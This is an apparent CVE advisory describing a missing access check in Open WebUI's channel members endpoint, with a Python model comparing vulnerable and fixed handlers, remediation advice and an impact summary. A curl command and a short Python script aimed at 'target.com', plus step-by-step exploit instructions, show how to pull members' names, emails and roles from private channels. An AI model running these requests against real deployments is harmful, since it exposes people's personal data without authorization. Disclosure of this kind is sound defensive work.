Open WebUI, Missing Access Check, N/A (Medium)


The vulnerability exists in the `get_channel_members_by_id` function in `backend/open_webui/routers/channels.py` (lines 445-507), which serves GET /api/v1/channels/{id}/members and is meant to return the member list of a given channel. The access-control logic only verifies membership for channels of type 'group' or 'dm' (lines 467-469). For standard channels, including private ones, no `channel_has_access` check is performed at all.

Any authenticated user who knows the UUID of a private standard channel (obtained from logs, browser history, `Referer` headers, or other API responses that reference the channel) can call the endpoint directly, and the server returns the full member list: IDs, names, emails, roles, and profile images. By contrast, `get_channel_messages` (line 688) correctly calls `channel_has_access(user.id, channel, permission='read')` for standard channels, so the same caller is refused the channel's messages but not its membership.

This is a classic missing authorization check leading to unauthorized information disclosure. Attack complexity is low: a valid account and network access suffice, with no user interaction and no privilege escalation. The CVSS 3.1 vector is AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, base score 4.3 (Medium). The channels feature must be enabled (it is disabled by default). The flaw affects the current main branch and likely every version that ships the channels feature.
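The following is an added example (written for this page, not code from the Open WebUI repository): a simplified in-memory model of the handler that places the vulnerable branch logic beside the hardened form. The `Channel` and `User` records, the `channel_has_access` stand-in, the `Forbidden` exception and the sample data are all constructed assumptions that mimic the behaviour described above; the real router works against a database and returns HTTP status codes instead of raising.

```python
"""Model of the authorization gap in get_channel_members_by_id.

Added illustration, not Open WebUI's code: the Channel/User records, the
channel_has_access stand-in and the in-memory store are constructed
assumptions that mimic the behaviour the advisory describes.
"""
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised where the real router would answer with HTTP 401/403."""


@dataclass
class User:
    id: str
    name: str
    email: str
    role: str
    profile_image_url: str = "/user.png"
    group_ids: set = field(default_factory=set)


@dataclass
class Channel:
    id: str
    type: str              # assumed values: "group", "dm" or "standard"
    private: bool = False  # only meaningful for standard channels in this model
    member_ids: set = field(default_factory=set)
    read_group_ids: set = field(default_factory=set)


def channel_has_access(user: User, channel: Channel, permission: str = "read") -> bool:
    """Stand-in for the real helper (assumed semantics): a public standard
    channel is readable by any authenticated user; a private one requires
    membership or a group that has been granted the permission."""
    if not channel.private:
        return True
    return user.id in channel.member_ids or bool(user.group_ids & channel.read_group_ids)


def member_view(u: User) -> dict:
    # The fields the advisory says the endpoint hands back.
    return {"id": u.id, "name": u.name, "email": u.email,
            "role": u.role, "profile_image_url": u.profile_image_url}


def members_vulnerable(user: User, channel: Channel, users: dict) -> list:
    """Mirrors the flaw: membership is enforced only for group/dm channels,
    so a private standard channel falls straight through to the listing."""
    if channel.type in ("group", "dm") and user.id not in channel.member_ids:
        raise Forbidden("not a member")
    return [member_view(users[m]) for m in sorted(channel.member_ids)]


def members_fixed(user: User, channel: Channel, users: dict) -> list:
    """Same handler with the read check that get_channel_messages already
    performs for standard channels applied here as well."""
    if channel.type in ("group", "dm"):
        if user.id not in channel.member_ids:
            raise Forbidden("not a member")
    elif not channel_has_access(user, channel, permission="read"):
        raise Forbidden("no read access to channel")
    return [member_view(users[m]) for m in sorted(channel.member_ids)]


def is_denied(handler, user: User, channel: Channel, users: dict) -> bool:
    """True when the handler refuses the caller."""
    try:
        handler(user, channel, users)
    except Forbidden:
        return True
    return False


# Constructed sample data: a private standard channel with two members and
# an authenticated user (Mallory) who is not one of them.
USERS = {
    "u1": User("u1", "Alice", "alice@example.com", "admin"),
    "u2": User("u2", "Bob", "bob@example.com", "user"),
    "u3": User("u3", "Mallory", "mallory@example.com", "user"),
}
PRIVATE_CHANNEL = Channel("550e8400-e29b-41d4-a716-446655440000", "standard",
                          private=True, member_ids={"u1", "u2"})
OUTSIDER = USERS["u3"]


def demo() -> dict:
    """Compare both handlers for the outsider: the vulnerable one leaks every
    member's email, the fixed one refuses while still serving a real member."""
    leaked = members_vulnerable(OUTSIDER, PRIVATE_CHANNEL, USERS)
    return {
        "vulnerable_leaked_emails": [m["email"] for m in leaked],
        "fixed_denies_outsider": is_denied(members_fixed, OUTSIDER, PRIVATE_CHANNEL, USERS),
        "fixed_allows_member": not is_denied(members_fixed, USERS["u1"], PRIVATE_CHANNEL, USERS),
    }


if __name__ == "__main__":
    print(demo())
```

The fixed handler deliberately reuses the same helper and permission name as the messages endpoint rather than inventing a second membership rule, so the two endpoints cannot drift apart again; a public standard channel still lists its members to any authenticated user, exactly as before.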

dailycve form:

Platform: Open WebUI
Version: main branch
Vulnerability: Missing access check
Severity: Medium
date: 2026-05-08

Prediction: 2026-05-22

Analytics under heading What Undercode Say:

Enumerate private channel members with curl (assumes a valid JWT in `JWT_TOKEN`):

```bash
# Constructed example UUID; replace with the leaked UUID of the target channel
CHANNEL_UUID="550e8400-e29b-41d4-a716-446655440000"
curl -s -X GET "https://target.com/api/v1/channels/${CHANNEL_UUID}/members" \
  -H "Authorization: Bearer ${JWT_TOKEN}" | jq '.'
```

Python script to exploit the missing access check:

```python
import requests

token = "<JWT of any authenticated user>"                            # valid session/API token
known_private_channel_uuid = "550e8400-e29b-41d4-a716-446655440000"  # leaked channel UUID
url = "https://target.com/api/v1/channels/{uuid}/members"
headers = {"Authorization": f"Bearer {token}"}
response = requests.get(url.format(uuid=known_private_channel_uuid), headers=headers, timeout=10)
# HTTP 200 for a channel the caller is not a member of confirms the missing check
if response.status_code == 200:
    for member in response.json():
        print(f"ID: {member['id']}, Name: {member['name']}, Email: {member.get('email')}")
else:
    print(f"HTTP {response.status_code}: {response.text}")
```

Exploit:

Authenticate to obtain a valid session token. Obtain the UUID of a private standard channel (a random UUID is not practically guessable, so it has to come from a leak: previously shared URLs, `Referer` headers, server logs, browser devtools, or other API responses that reference the channel). Send a GET request to `/api/v1/channels/{uuid}/members` with the token. Parse the JSON response to extract every member's ID, name, email, role, and profile image.

Protection from this CVE:

Apply the patch that adds a `channel_has_access(user.id, channel, permission='read')` check for standard channels before returning members, mirroring the check `get_channel_messages` already performs. Alternatively, disable the channels feature if it is not needed. Upgrade to a fixed version once one is released. In the meantime, rate-limit and log requests to the member-list endpoint so that bulk enumeration of channel UUIDs by a single account stands out.

Impact:

Leaks identities, emails, and roles of all users in a private channel. Reveals organizational structure and project assignments. Enables targeted social engineering, spear-phishing, and internal network mapping. Compromises privacy of channel members without exposing message content.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
